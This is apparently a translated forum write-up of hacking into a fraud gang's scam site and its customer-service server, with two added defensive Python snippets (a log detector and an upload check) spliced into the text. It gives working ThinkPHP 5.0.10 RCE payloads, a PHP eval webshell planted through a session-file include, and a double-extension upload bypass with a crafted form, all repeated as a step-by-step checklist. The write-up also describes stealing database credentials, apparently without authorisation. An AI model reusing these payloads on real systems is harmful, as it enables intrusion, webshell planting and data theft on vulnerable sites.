
Recently I received a task to investigate a fraud gang.

There is a registration interface on the site. I registered a user first to see how they cheat.

Good guy, users have "earned" 800 million yuan, and the users who recharged call themselves experts.

At first glance, this kind of site is the pig-butchering scam site of a fraud gang. It is built with the TP5 framework in one click, convenient and trouble-free. Later, according to the error message, the framework was indeed tp5.0.10 running in debug mode, so it really was a pig-butchering site.

Just use the tp5 RCE to hit phpinfo first:

s=captcha

post:

_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo

It seems many functions are disabled. At this point it is harder to write a shell with the tp5 RCE alone; it is much more convenient to getshell via tp5 log inclusion or session inclusion.

With the log you still need to find the log file, so I will include the session directly to getshell.

First, set the session and pass in a one-line webshell:

?s=captcha

post:

_method=__construct&filter[]=think\Session:set&method=get&get[]=<?php eval($_POST['x'])?>&server[]=1

Then directly include the session file with the file include. The tp5 session file is usually under /tmp, and the file name is session_sessionid:

?s=captcha

post:

_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=/tmp/sess_0mg7tlcvtmpv06cb732j47chb3&x=phpinfo();

At this point we can connect to the shell with AntSword.

You need to add the parameters passed in the POST to the HTTP body of the AntSword connection.
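From the defender's side, the three requests above share a small set of indicators: the s=captcha route, a POST body overriding _method to __construct, a filter[] value naming a callable, and an include of a session file under /tmp. The following detector is an added example written for this post, not code from the original writeup or from ThinkPHP; the log records it parses are constructed here in a simple "METHOD URL<tab>BODY" shape, and the set of flagged callables is an assumption extended from the two the post uses.

```python
"""
Detect ThinkPHP 5.0.x method-override RCE probing in request records.
Added example: flags the indicators shown in the post (s=captcha route,
_method=__construct, filter[] naming a callable, include of /tmp/sess_*).
"""
from urllib.parse import parse_qs, urlparse

# Constructed sample records: "METHOD URL\tBODY" (a tab separates the body).
# Lines 1-2 mirror the post's payload shape; lines 3-4 are benign traffic.
SAMPLE_LOG = """\
POST /index.php?s=captcha\t_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo
POST /index.php?s=captcha\t_method=__construct&method=get&filter[]=think\\__include_file&server[]=phpinfo&get[]=/tmp/sess_EXAMPLE&x=phpinfo()
POST /index.php?s=user/login\tusername=alice&password=hunter2
GET /index.php?s=index/index\t
"""

# Callables seen in the post's payloads plus a few assumed common ones.
SUSPICIOUS_FILTERS = {"call_user_func", "think\\__include_file", "system", "assert"}


def parse_record(line):
    """Split one constructed record into (method, path, query dict, body dict)."""
    request, _, body = line.partition("\t")
    method, _, url = request.partition(" ")
    parsed = urlparse(url)
    return method, parsed.path, parse_qs(parsed.query), parse_qs(body)


def score_request(line):
    """Return the list of indicator names matched by this record (empty if benign)."""
    method, path, query, body = parse_record(line)
    hits = []
    # All of the post's payloads are routed through s=captcha
    if query.get("s") == ["captcha"]:
        hits.append("route=captcha")
    # Method override to the constructor is the core of the 5.0.x RCE chain
    if body.get("_method") == ["__construct"]:
        hits.append("method_override=__construct")
    # Injected filter[] values that name a dangerous callable
    for value in body.get("filter[]", []):
        if value in SUSPICIOUS_FILTERS:
            hits.append("filter=" + value)
    # Attempted inclusion of a PHP session file from /tmp
    for value in body.get("get[]", []):
        if value.startswith("/tmp/sess_"):
            hits.append("include=/tmp/sess_")
    return hits


def detect(log_text):
    """Return [(line_number, hits)] for records matching at least two indicators."""
    findings = []
    for number, line in enumerate(log_text.splitlines(), 1):
        hits = score_request(line)
        if len(hits) >= 2:
            findings.append((number, hits))
    return findings


if __name__ == "__main__":
    for number, hits in detect(SAMPLE_LOG):
        print(f"record {number}: {', '.join(hits)}")
```

Requiring two indicators keeps a lone s=captcha request (the legitimate captcha route) from firing; in practice the same logic belongs in a WAF rule or a request-body-aware log pipeline, and the fix on the application side is the vendor patch plus turning app_debug off, since the post's foothold started from the debug error page.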

After connecting, I found the database account and password in database.php under config.

There is also finance and technical contact information.

Logged straight into the backend.

Good guy, there are 30 members and more than 400 bots. The amounts can be modified at will in the backend. It is far too bullying.

I always feel the information gathered by this point is a little too thin: only a few mobile phone numbers and the bank card the fraud gang uses to collect payments. So I collected information on the operating site, and it turned out the customer service site was on another server.

Found the customer service backend through directory scanning.

I tried weak passwords and found there was not even an admin user. The administrator is quite security-aware.

I took out my treasured dictionary and brute-forced it, but didn't find any existing user. I guess the username is either a phone number or a very long one.

It seems getting into the backend this way is not going to work.

Then through reverse IP lookup I found there were no other sites on the host; this server only has this customer service system.

I scanned the domain name and found nothing.

But there is a "Powered by Ai Customer Service PHP online customer service system" at the bottom of the page. I thought the source code should be available online, so I went to Baidu, and it really does have source code.

The site is a secondary development on top of TP, but TP's RCE is gone.

The only way left is to audit it step by step.

After searching for a long time, I found a blacklist-based upload function uploadimg in the application/admin/controller/Event.php file.

It defines an upload function uploadimg, then a variable name that holds the file name, splits it on the dot into an array, and takes the second array element as the variable ext for the check. When the uploaded file is index.html, $ext=html; html is on the blacklist, so the upload fails. If the uploaded file is index.jpg.php, $ext=jpg; jpg is not on the blacklist, so it can be uploaded successfully.

According to TP's routing rules, this upload point should be at /admin/event/uploadimg.

There is no upload point on the page, so I constructed an upload page myself:

<form action='http://ip/admin/event/uploadimg' method='post' enctype='multipart/form-data'>

<label for='file'>Chenguang customer service upload</label>

<input type='file' name='editormd-image-file' id='editormd-image-file'>

<input type='submit' name='submit' value='submit'>

</form>

Uploading index.php: the upload really does fail.

Uploading index.jpg.php: it uploads successfully.
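The root cause is the extension check, not the blacklist contents: taking the second dot-separated piece means anything after the first extension is never looked at. The block below is an added example (not the project's Event.php, which is reconstructed here only from the post's description) that puts that check beside a hardened one. The blacklist and allowlist values are constructed; html and php are the two entries the post's tests imply, the rest are assumptions.

```python
"""
Extension check of the uploadimg function as the post describes it, beside a
hardened version. Added example; the lists below are constructed.
"""
import os
import secrets

# Constructed blacklist standing in for the one in Event.php
BLACKLIST = {"php", "phtml", "php5", "html", "htm", "js"}

# Allowlist for an image upload endpoint (assumption: only images are intended)
ALLOWLIST = {"jpg", "jpeg", "png", "gif"}


def ext_vulnerable(filename):
    """Reproduces the flaw: split on '.', take index 1, so 'index.jpg.php' -> 'jpg'."""
    parts = filename.split(".")
    return parts[1] if len(parts) > 1 else ""


def check_vulnerable(filename):
    """Blacklist check on the wrong segment, as described in the post."""
    return ext_vulnerable(filename) not in BLACKLIST


def check_hardened(filename):
    """Last extension only, lowercased, allowlisted, and no inner dots at all."""
    base = os.path.basename(filename)          # drop any path components
    stem, dot, ext = base.rpartition(".")
    if not dot or not stem or "." in stem:     # no extension, or a double extension
        return False
    return ext.lower() in ALLOWLIST


def stored_name(filename):
    """Server-chosen name: random stem plus the validated extension; the client name is discarded."""
    if not check_hardened(filename):
        raise ValueError("rejected upload: " + filename)
    ext = os.path.basename(filename).rpartition(".")[2].lower()
    return f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    for name in ("index.html", "index.php", "index.jpg.php", "photo.PNG"):
        print(f"{name:14} vulnerable={check_vulnerable(name)!s:5} hardened={check_hardened(name)}")
```

The hardened check rejects double extensions outright rather than trusting the last one, because some web server configurations execute a file based on any extension segment in its name; storing the file under a server-generated name and outside the web root, with the upload route itself behind authentication, closes the rest of the gap the post exploited.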

Took over the customer service site.

Packaged the backend data and handed it over to the police.

Here I would like to urge everyone not to believe in order-brushing scams. Those who tell you that recharging will make you money are all fake. Don't dream of getting rich overnight or taking advantage of anything; there is no free lunch in the world. Here are a few pictures for you to see.

These fraud gangs sound justified and well-founded, and will only ask you to put in more and more. They are typical pig-butchering trash.

Penetration summary:

1. Register a test account.

2. After an error was reported, it was found to be tp5.0.10.

3. Use the TP5 RCE to view phpinfo:

s=captcha

post:

_method=__construct&method=get&filter[]=call_user_func&get[]=phpinfo

The dangerous functions were found to be disabled.

4. Use tp5 log inclusion or session inclusion to getshell.

5. Set the session and pass in a one-line webshell:

?s=captcha

post:

_method=__construct&filter[]=think\Session:set&method=get&get[]=<?php eval($_POST['x'])?>&server[]=1

6. Use the file include to include the session file. The tp5 session files are usually under /tmp, and the file name is session_sessionid:

?s=captcha

post:

_method=__construct&method=get&filter[]=think\__include_file&server[]=phpinfo&get[]=/tmp/sess_0mg7tlcvtmpv06cb732j47chb3&x=phpinfo();

7. Connect to the shell with AntSword, adding the parameters passed in the POST to the HTTP body of the AntSword connection.

8. Discover the customer service backend through the backend source code.

9. Find that the customer service backend is the Ai Customer Service PHP online customer service system, and that there is a file upload vulnerability in it:

/admin/event/uploadimg

<form action='http://ip/admin/event/uploadimg' method='post' enctype='multipart/form-data'>

<label for='file'>Chenguang customer service upload</label>

<input type='file' name='editormd-image-file' id='editormd-image-file'>

<input type='submit' name='submit' value='submit'>

</form>

Original link: https://xz.aliyun.com/t/9286
